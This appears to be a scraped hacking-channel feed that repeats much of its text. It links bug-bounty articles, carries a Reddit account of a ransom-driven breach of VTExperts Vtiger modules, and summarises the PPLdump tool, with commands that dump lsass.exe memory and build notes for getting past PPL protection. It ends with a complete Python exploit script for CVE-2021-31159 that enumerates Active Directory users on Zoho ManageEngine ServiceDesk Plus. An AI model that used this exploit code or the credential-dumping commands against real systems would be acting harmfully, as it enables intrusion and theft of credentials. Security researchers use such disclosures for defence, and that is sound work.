All the actions described in the article were performed with the permission of the site owner as the part of vulnerability tests.
Requests…Continue reading on Medium » (https://0xbadb00da.medium.com/account-takeover-via-stored-xss-with-arbitrary-file-upload-2774ec6cff51?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Requests…Continue reading on Medium » (https://0xbadb00da.medium.com/account-takeover-via-stored-xss-with-arbitrary-file-upload-2774ec6cff51?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Account takeover via stored XSS with arbitrary file upload
All the actions described in the article were performed with the permission of the site owner as the part of vulnerability tests. Requests…
hacking: security in practice
How to use google dork to find bug bounty program which are not listed on hackerone ?
How to use google dork to find bug bounty program which are not listed on hackerone ?
submitted by /u/Firm-Bunch-5049
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to use google dork to find bug bounty program which are not listed on hackerone ?
How to use google dork to find bug bounty program which are not listed on hackerone ?
submitted by /u/Firm-Bunch-5049
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to use google dork to find bug bounty program which are not...
How to use google dork to find bug bounty program which are not listed on hackerone ?
hacking: security in practice
Follow up on previously found data breach
I am following up on this post I made here: https://www.reddit.com/r/hacking/comments/ns32i2/i_have_learnt_of_a_data_breach_and_the_company_is/
I will write [hackers] because I don't know how many they are, where, age, gender, group name, motive (apart from money), etc.
I have had a phone call with the company here and have heard their side of the story. I have also checked other factors which would directly put myself at risk.
The company is VTExperts, who make the paid subscription ion(?)-encrypted Vtiger modules.
I was contacted by [hackers] directly via email. They had breached my VT CRM (logs, dropped files, etc). We did not have any default passwords. I responded to the hackers, thanked them for notifying me of the of the exploit and asked them if they would assist me by telling my how they breached it, and how to protect it. I offered payment for this service. They accepted, and proceeded to tell me that they breached the CRM using the module 'vtestore' but declined to tell me the exact procedure. They advised I protect the CRM with an IP whitelisted .htaccess file, and that they can't fix the exact code since it's in vtestore and is encrypted - something about them needed an ioncube (?) license. Sounded legit.
I contacted VTExperts, they seemed less than convinced it was their modules at fault.
I asked the [hackers] for some proof, which they happily provided much. I am even developing another CRM using VTExperts - and asked if they were able to breach that. They came back in 10 minutes with my SQL details, including password. The logs show access to files/folders within the vtestore folders. They also showed me screenshots/videos with the VTExperts SVN repo, SQL dump, screenshot of their license panel.
They then breached VTExperts hosted VTiger CRM instances (around 5 servers each containing a number of installations), downloading all SQL data and files. They proved this and showed me a screenshots of files from companies - notable a law firm in the USA (client court documents I think).
They have subsequently "shown off" by changing the login pages of various VT CRM instances.
Why are they showing me? Simple - by strengthening my position as an angry, aggrieved customer of VTExperts, I am strengthening their position to prove the severity of the situation and subsequently their demands/ransom. They are new to this - not an opinion - they outright told me. I happily and selfishly accept this evidence (after my own scrutinisation). How do they get in touch with me? They have all my contact details from VT and I receive various messages, like Signal, Telegram, Wickr, Pastebins, etc. (self destructing messages obviously). Even Reddit.
VTExperts responded by enabling Cloudflare 2FA on their hosted servers.
So, onto my phone call. VTExperts seemed convinced that weak passwords were at play. I showed them my evidence and it they seemed to accept it. They said that they were aware of a CRM breach 10 months ago involving a medical company. They told me that the [hackers] are demanding 40BTC, around $1.5M. They (Tom of VTExperts) said that the [hackers] have been making demands for quite a while.
So it's been going on for a while. The [hackers] claim that they breached the VTExperts servers/modules 1.5 years ago, and found the first bugs in 2017.
I told (Tom) of VTExperts that I am obviously upset that they were aware there could have been an issue many months ago. I told him that I believe that the [hackers] have been using this time to download masses of data from VTExperts hosted Vtiger CRMs and self-hosted instances. VTExperts license panel (as shown to me in screenshots) has a column listing all Vtiger instances running the software.
I mentioned that there are serious implication[...]
___________________________
@hacking_Attack
@Hacking_Video
Follow up on previously found data breach
I am following up on this post I made here: https://www.reddit.com/r/hacking/comments/ns32i2/i_have_learnt_of_a_data_breach_and_the_company_is/
I will write [hackers] because I don't know how many they are, where, age, gender, group name, motive (apart from money), etc.
I have had a phone call with the company here and have heard their side of the story. I have also checked other factors which would directly put myself at risk.
The company is VTExperts, who make the paid subscription ion(?)-encrypted Vtiger modules.
I was contacted by [hackers] directly via email. They had breached my VT CRM (logs, dropped files, etc). We did not have any default passwords. I responded to the hackers, thanked them for notifying me of the of the exploit and asked them if they would assist me by telling my how they breached it, and how to protect it. I offered payment for this service. They accepted, and proceeded to tell me that they breached the CRM using the module 'vtestore' but declined to tell me the exact procedure. They advised I protect the CRM with an IP whitelisted .htaccess file, and that they can't fix the exact code since it's in vtestore and is encrypted - something about them needed an ioncube (?) license. Sounded legit.
I contacted VTExperts, they seemed less than convinced it was their modules at fault.
I asked the [hackers] for some proof, which they happily provided much. I am even developing another CRM using VTExperts - and asked if they were able to breach that. They came back in 10 minutes with my SQL details, including password. The logs show access to files/folders within the vtestore folders. They also showed me screenshots/videos with the VTExperts SVN repo, SQL dump, screenshot of their license panel.
They then breached VTExperts hosted VTiger CRM instances (around 5 servers each containing a number of installations), downloading all SQL data and files. They proved this and showed me a screenshots of files from companies - notable a law firm in the USA (client court documents I think).
They have subsequently "shown off" by changing the login pages of various VT CRM instances.
Why are they showing me? Simple - by strengthening my position as an angry, aggrieved customer of VTExperts, I am strengthening their position to prove the severity of the situation and subsequently their demands/ransom. They are new to this - not an opinion - they outright told me. I happily and selfishly accept this evidence (after my own scrutinisation). How do they get in touch with me? They have all my contact details from VT and I receive various messages, like Signal, Telegram, Wickr, Pastebins, etc. (self destructing messages obviously). Even Reddit.
VTExperts responded by enabling Cloudflare 2FA on their hosted servers.
So, onto my phone call. VTExperts seemed convinced that weak passwords were at play. I showed them my evidence and it they seemed to accept it. They said that they were aware of a CRM breach 10 months ago involving a medical company. They told me that the [hackers] are demanding 40BTC, around $1.5M. They (Tom of VTExperts) said that the [hackers] have been making demands for quite a while.
So it's been going on for a while. The [hackers] claim that they breached the VTExperts servers/modules 1.5 years ago, and found the first bugs in 2017.
I told (Tom) of VTExperts that I am obviously upset that they were aware there could have been an issue many months ago. I told him that I believe that the [hackers] have been using this time to download masses of data from VTExperts hosted Vtiger CRMs and self-hosted instances. VTExperts license panel (as shown to me in screenshots) has a column listing all Vtiger instances running the software.
I mentioned that there are serious implication[...]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Follow up on previously found data breach
I am following up on this post I made...
Hacking Articles Tips Tricks Videos Tutorials
hacking: security in practice Follow up on previously found data breach I am following up on this post I made here: https://www.reddit.com/r/hacking/comments/ns32i2/i_have_learnt_of_a_data_breach_and_the_company_is/ I will write [hackers] because I don't…
s in the UK of this kind of breach, and hiding it (GDPR) but that I am unaware of US law.
Tom said that he is considering options. Whether he should go public, and how, or if he should pay a ransom.
Shortly after our phone call, the [hackers] got in touch again and told me that they had set a deadline for their random for VTExperts. They of course enjoy showing how good they are. (Maybe they saw changes in our CRM or VTExperts servers or something?).
I have since found this on the VTiger forums: https://discussions.vtiger.com/discussion/193627/vtexperts-com-company-hacked-breach-leak/p1?new=1
Which confirms that the user who contacted me on Reddit is them.
So yeah, in summary, I believe that any VTiger CRM running VTExperts is susceptible to, or has already been breached by these [hackers].
I realise that I may not have handled this situation perfectly (maybe should have announced sooner) and I admit that I was being somewhat selfish making sure that I was not putting myself at risk (legal or otherwise).
For those out there that want something more, here are the logs from when the [hackers] took 10 minutes to breach the 2nd (previously unaffected, new) Vtiger CRM running VTExperts: https://pastebin.com/94Z2Ah47 - The blank removed lines are access lines from my own IP.
If I answer any significant questions on comments, I'll add them here.
submitted by /u/Sly-D [link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Tom said that he is considering options. Whether he should go public, and how, or if he should pay a ransom.
Shortly after our phone call, the [hackers] got in touch again and told me that they had set a deadline for their random for VTExperts. They of course enjoy showing how good they are. (Maybe they saw changes in our CRM or VTExperts servers or something?).
I have since found this on the VTiger forums: https://discussions.vtiger.com/discussion/193627/vtexperts-com-company-hacked-breach-leak/p1?new=1
Which confirms that the user who contacted me on Reddit is them.
So yeah, in summary, I believe that any VTiger CRM running VTExperts is susceptible to, or has already been breached by these [hackers].
I realise that I may not have handled this situation perfectly (maybe should have announced sooner) and I admit that I was being somewhat selfish making sure that I was not putting myself at risk (legal or otherwise).
For those out there that want something more, here are the logs from when the [hackers] took 10 minutes to breach the 2nd (previously unaffected, new) Vtiger CRM running VTExperts: https://pastebin.com/94Z2Ah47 - The blank removed lines are access lines from my own IP.
If I answer any significant questions on comments, I'll add them here.
submitted by /u/Sly-D [link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Vtiger
VTEXPERTS.com company Hacked - Breach & Leak
proof 1: https://gofile.io/d/C0QDPm proof 1a: https://easyupload.io/r3iywf if need more proof contact us
Account takeover via stored XSS with arbitrary file upload
All the actions described in the article were performed with the permission of the site owner as the part of vulnerability tests. Requests…Continue reading on Medium »
Read more...
All the actions described in the article were performed with the permission of the site owner as the part of vulnerability tests. Requests…Continue reading on Medium »
Read more...
Polkit Version 0.105–26 0.117–2 Suffers a Local Privilege Escalation
More @ https://skynettools.com/Continue reading on Medium »
Read more...
More @ https://skynettools.com/Continue reading on Medium »
Read more...
pyWhat — Identify Useful Information Within Files & Text
https://skynettools.medium.com/pywhat-identify-useful-information-within-files-text-837e220128d9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://skynettools.medium.com/pywhat-identify-useful-information-within-files-text-837e220128d9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
pyWhat — Identify Useful Information Within Files & Text
Well, with what all you have to do is ask what “5f4dcc3b5aa765d61d8327deb882cf99” and what will tell you! what’s job is to identify what something is. Whether it be a file or text! Or even the hex of…
Continue reading on Medium » (https://skynettools.medium.com/pywhat-identify-useful-information-within-files-text-837e220128d9?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
pyWhat — Identify Useful Information Within Files & Text
Well, with what all you have to do is ask what “5f4dcc3b5aa765d61d8327deb882cf99” and what will tell you! what’s job is to identify what something is. Whether it be a file or text! Or even the hex of…
Polkit Version 0.105–26 0.117–2 Suffers a Local Privilege Escalation
https://skynettools.medium.com/polkit-version-0-105-26-0-117-2-suffers-a-local-privilege-escalation-6d10d9725058?source=rss------bug_bounty-5
More @ https://skynettools.com/Continue reading on Medium » (https://skynettools.medium.com/polkit-version-0-105-26-0-117-2-suffers-a-local-privilege-escalation-6d10d9725058?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://skynettools.medium.com/polkit-version-0-105-26-0-117-2-suffers-a-local-privilege-escalation-6d10d9725058?source=rss------bug_bounty-5
More @ https://skynettools.com/Continue reading on Medium » (https://skynettools.medium.com/polkit-version-0-105-26-0-117-2-suffers-a-local-privilege-escalation-6d10d9725058?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Polkit Version 0.105–26 0.117–2 Suffers a Local Privilege Escalation
More @ https://skynettools.com/
PPLdump - Dump The Memory Of A PPL With A Userland Exploit
http://www.kitploit.com/2021/06/ppldump-dump-memory-of-ppl-with.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/06/ppldump-dump-memory-of-ppl-with.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
PPLdump - Dump The Memory Of A PPL With A Userland Exploit
Usage:
PPLdump.exe [-v] [-d] [-f]
Arguments:
PROC_NAME The name of a Process to dump
PROC_ID The ID of a Process to dump
DUMP_FILE The path of the output dump file
Options:
-v (Verbose) Enable verbose mode
-d (Debug) Enable debug mode (implies verbose)
-f (Force) Bypass DefineDosDevice error check
Examples:
PPLdump.exe lsass.exe lsass.dmp
PPLdump.exe -v 720 out.dmp
FAQ
Does it work on all versions of Windows?
First of all, PPLs were introduced with Windows 8.1 so older versions of Windows are obviously not supported. This project mainly targets Windows 10 (and its server editions) but I also tested it on older versions. You will find a summary table of the tests I did in the eponymous section.
How is it different from other tools?
Other PPL bypass tools usually execute arbitrary code in the Kernel through a digitally signed driver. This one is different as it involves only userland tricks and is (almost) fileless.
"Userland", you say?!
This tool leverages a very clever trick that was initially discussed by James Forshaw in 2018 (see Credits). It involves the use of the DefineDosDevice API function to trick the system into creating an arbitrary Known DLL entry. Since PPLs do not check the digital signature of Known DLLs, this can be later used to perform a DLL hijacking attack and execute arbitrary code inside a PPL.
Is it really "fileless"?
Although this tool performs a DLL hijacking attack as a second stage, it does not create a new DLL file on disk. Instead, it makes use of an NTFS transaction to virtually replace the content of an existing one, a technique directly inspired by the work of @_ForrestOrr (https://twitter.com/_ForrestOrr) (see Credits).
Can this tool cause a DoS?
Ths short answer is "no". First, it does not involve any direct Kernel access so there is no risk of causing a BSOD from this standpoint. In the worst case scenario, the tool might fail to remove the created Known DLL entry but, this will not cause a Denial of Service. It will just stay there until the next machine reboot. As the created entry would just be a symbolic link pointing to a non-existent section, the system would eventually fall back to the default location (i.e. the System32 folder) so it will not impact other programs running on the machine.
Tests
Windows version Build Edition Arch Admin SYSTEM Windows 10 20H2 19042 Pro x64 ✔️ ✔️ Windows 10 20H2 19042 Pro x86 ✔️ ✔️ Windows 10 1909 18363 Pro x64 ✔️ ✔️ Windows 10 1507 10240 Educational x64 ✔️ ✔️ Windows 10 1507 10240 Home x64 ✔️ ✔️ Windows 10 1507 10240 Pro x64 ✔️ ✔️ Windows Server 2019 17763 Standard x64 ✔️ ✔️ Windows Server 2019 17763 Essentials x64 ✔️ ✔️ Windows 8.1 9600 Pro x64 ⚠️ ⚠️ Windows Server 2012 R2 9600 Standard x64 ⚠️ ⚠️ ⚠️ The exploit fails on fully updated Windows 8.1 / Server 2012 R2 machines. I have yet to figure out which patch caused the error. [-] DefineDosDevice failed with error code 6 - The handle is invalid. On Windows 8.1 / Server 2012 R2, you might also have to compile the binary statically (see "Build instructions" below).Build instructions
This Visual Studio Solution comprises two projects (the executable and a payload DLL) that need to be compiled in a specific order. Everything is pre-configured, so you just have to follow these simple instructions. The compiled payload DLL is automatically embedded into the final executable. Open the Solution with Visual Studio 2019. Select Release / x64 or Release / x86 depending on the architecture of the target machine. Build > Build Solution. On Windows 8.1 / Server 2012 R2, you might have to compile the binary statically. Right-click on the PPLdump project. Go to Configuration Properties > C/C++ > Code Generation. Select Multi-threaded (/MT) as the Runtime Library option. Build the Solution.
Credits
___________________________
@hacking_Attack
@Hacking_Video
PPLdump.exe [-v] [-d] [-f]
Arguments:
PROC_NAME The name of a Process to dump
PROC_ID The ID of a Process to dump
DUMP_FILE The path of the output dump file
Options:
-v (Verbose) Enable verbose mode
-d (Debug) Enable debug mode (implies verbose)
-f (Force) Bypass DefineDosDevice error check
Examples:
PPLdump.exe lsass.exe lsass.dmp
PPLdump.exe -v 720 out.dmp
FAQ
Does it work on all versions of Windows?
First of all, PPLs were introduced with Windows 8.1 so older versions of Windows are obviously not supported. This project mainly targets Windows 10 (and its server editions) but I also tested it on older versions. You will find a summary table of the tests I did in the eponymous section.
How is it different from other tools?
Other PPL bypass tools usually execute arbitrary code in the Kernel through a digitally signed driver. This one is different as it involves only userland tricks and is (almost) fileless.
"Userland", you say?!
This tool leverages a very clever trick that was initially discussed by James Forshaw in 2018 (see Credits). It involves the use of the DefineDosDevice API function to trick the system into creating an arbitrary Known DLL entry. Since PPLs do not check the digital signature of Known DLLs, this can be later used to perform a DLL hijacking attack and execute arbitrary code inside a PPL.
Is it really "fileless"?
Although this tool performs a DLL hijacking attack as a second stage, it does not create a new DLL file on disk. Instead, it makes use of an NTFS transaction to virtually replace the content of an existing one, a technique directly inspired by the work of @_ForrestOrr (https://twitter.com/_ForrestOrr) (see Credits).
Can this tool cause a DoS?
Ths short answer is "no". First, it does not involve any direct Kernel access so there is no risk of causing a BSOD from this standpoint. In the worst case scenario, the tool might fail to remove the created Known DLL entry but, this will not cause a Denial of Service. It will just stay there until the next machine reboot. As the created entry would just be a symbolic link pointing to a non-existent section, the system would eventually fall back to the default location (i.e. the System32 folder) so it will not impact other programs running on the machine.
Tests
Windows version Build Edition Arch Admin SYSTEM Windows 10 20H2 19042 Pro x64 ✔️ ✔️ Windows 10 20H2 19042 Pro x86 ✔️ ✔️ Windows 10 1909 18363 Pro x64 ✔️ ✔️ Windows 10 1507 10240 Educational x64 ✔️ ✔️ Windows 10 1507 10240 Home x64 ✔️ ✔️ Windows 10 1507 10240 Pro x64 ✔️ ✔️ Windows Server 2019 17763 Standard x64 ✔️ ✔️ Windows Server 2019 17763 Essentials x64 ✔️ ✔️ Windows 8.1 9600 Pro x64 ⚠️ ⚠️ Windows Server 2012 R2 9600 Standard x64 ⚠️ ⚠️ ⚠️ The exploit fails on fully updated Windows 8.1 / Server 2012 R2 machines. I have yet to figure out which patch caused the error. [-] DefineDosDevice failed with error code 6 - The handle is invalid. On Windows 8.1 / Server 2012 R2, you might also have to compile the binary statically (see "Build instructions" below).Build instructions
This Visual Studio Solution comprises two projects (the executable and a payload DLL) that need to be compiled in a specific order. Everything is pre-configured, so you just have to follow these simple instructions. The compiled payload DLL is automatically embedded into the final executable. Open the Solution with Visual Studio 2019. Select Release / x64 or Release / x86 depending on the architecture of the target machine. Build > Build Solution. On Windows 8.1 / Server 2012 R2, you might have to compile the binary statically. Right-click on the PPLdump project. Go to Configuration Properties > C/C++ > Code Generation. Select Multi-threaded (/MT) as the Runtime Library option. Build the Solution.
Credits
___________________________
@hacking_Attack
@Hacking_Video
Twitter
Forrest Orr (@_ForrestOrr) | Twitter
The latest Tweets from Forrest Orr (@_ForrestOrr). Red Teamer, low level coding extremist and malware researcher. Writer and aspiring exploit writer
@tiraniddo (https://twitter.com/tiraniddo) - Windows Exploitation (https://www.kitploit.com/search/label/Windows%20Exploitation) Tricks: Exploiting (https://www.kitploit.com/search/label/Exploiting) Arbitrary Object Directory Creation for Local Elevation of Privilege
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html @_ForrestOrr (https://twitter.com/_ForrestOrr) - Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing
https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing
Download PPLdump (https://github.com/itm4n/PPLdump)
___________________________
@hacking_Attack
@Hacking_Video
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html @_ForrestOrr (https://twitter.com/_ForrestOrr) - Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing
https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing
Download PPLdump (https://github.com/itm4n/PPLdump)
___________________________
@hacking_Attack
@Hacking_Video
X (formerly Twitter)
James Forshaw (@tiraniddo) on X
Security researcher in Google Project Zero. Author of Attacking Network Protocols. Tweets are my own etc. Mastodon: @tiraniddo@infosec.exchange
Certified Pre-Owned
https://www.reddit.com/r/redteamsec/comments/o2994w/certified_preowned/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://posts.specterops.io/certified-pre-owned-d95910965cd2) [comments] (https://www.reddit.com/r/redteamsec/comments/o2994w/certified_preowned/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/o2994w/certified_preowned/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://posts.specterops.io/certified-pre-owned-d95910965cd2) [comments] (https://www.reddit.com/r/redteamsec/comments/o2994w/certified_preowned/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Certified Pre-Owned
Posted in r/redteamsec by u/dmchell • 4 points and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration
https://2.bp.blogspot.com/-swqN45HZtSI/WWlvXv0Z4fI/AAAAAAAAIOY/czRV0nNAPTIk5N0xfOCTXuQJzRjI48a4wCLcBGAs/s1600/h53.png
Zoho ManageEngine ServiceDesk Plus version 9.4 suffers from a user enumeration vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration
https://2.bp.blogspot.com/-swqN45HZtSI/WWlvXv0Z4fI/AAAAAAAAIOY/czRV0nNAPTIk5N0xfOCTXuQJzRjI48a4wCLcBGAs/s1600/h53.png
Zoho ManageEngine ServiceDesk Plus version 9.4 suffers from a user enumeration vulnerability.
MD5 |
55c56b21ed33b96bade44b3319c1fcd0Download
# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP - Active Directory User Enumeration (CVE-2021-31159)
# Date: 17/06/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
# Vendor Homepage: https://www.manageengine.com
# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
# Version: Previous to build 10519
# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159
import argparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')
parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
my_args = parser.parse_args()
return my_args
def main():
args = get_args()
url = args.target
domain = args.domain
usersfile = args.usersfile
outputfile = args.outputfile
s = requests.session()
s.get(url)
resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False)
incorrect_size = len(resp_incorrect.content)
print("Incorrect size: %s"%(incorrect_size))
correct_users = []
users = open(usersfile).read().splitlines()
for u in users:
resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False)
valid = (len(resp.content) != incorrect_size)
if valid:
correct_users.append(u)
print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid)))
print("\nCorrect users\n")
with open(outputfile, 'w') as f:
for user in correct_users:
f.write("%s\n" % user)
print("- %s"%(user))
print("\nResults stored in %s\n"%(outputfile))
if __name__ == "__main__":
main()
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.